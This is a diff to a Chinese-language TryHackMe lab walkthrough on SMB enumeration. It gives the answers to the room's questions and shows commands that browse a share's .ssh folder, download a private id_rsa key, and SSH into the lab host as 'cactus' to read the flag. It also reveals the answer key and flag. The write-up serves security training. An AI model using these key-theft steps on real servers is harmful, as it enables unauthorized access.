--- a/docs/penetration/tryhackme/6.Network_SMB.md
+++ b/docs/penetration/tryhackme/6.Network_SMB.md
@@ -220,8 +220,46 @@ Department Manager
 
 :::
 
-::: details ## 配置了什么服务允许他在家工作？
+::: details  配置了什么服务允许他在家工作？
 **答案**：`ssh`
 
 :::
 
+::: details  好的，我会的现在我们知道了这一点，我们应该在共享上的哪个目录中查找？
+**答案**：`.ssh`
+
+:::
+
+:: details  此目录包含允许用户在服务器上进行身份验证并随后访问服务器的身份验证密钥。这些钥匙中哪一个对我们最有用？
+
+**答案**：`id_rsa`
+
+```bash
+smb: \> cd .ssh
+smb: \.ssh\> ls
+  .                                   D        0  Tue Apr 21 13:08:23 2020
+  ..                                  D        0  Tue Apr 21 13:08:23 2020
+  id_rsa                              A     1679  Tue Apr 21 13:08:23 2020
+  id_rsa.pub                          N      396  Tue Apr 21 13:08:23 2020
+  authorized_keys                     N        0  Tue Apr 21 13:08:23 2020
+```
+
+:::
+
+将此文件下载到本地计算机，并使用“chmod 600 [`file`]"将权限更改为“600”。
+现在，使用您已经收集的信息来计算帐户的用户名。然后，使用服务和密钥登录到服务器。
+
+::: details  What is the smb.txt flag?
+**答案**：`THM{smb_is_fun_eh?}`
+
+```bash
+get id_rsa
+
+
+chmod 600 id_rsa  $chmod 600 id_rosa
+ssh -i id_rsa cactus@10.10.187.207
+
+cat smb.txt
+THM{smb_is_fun_eh?}
+```
+:::
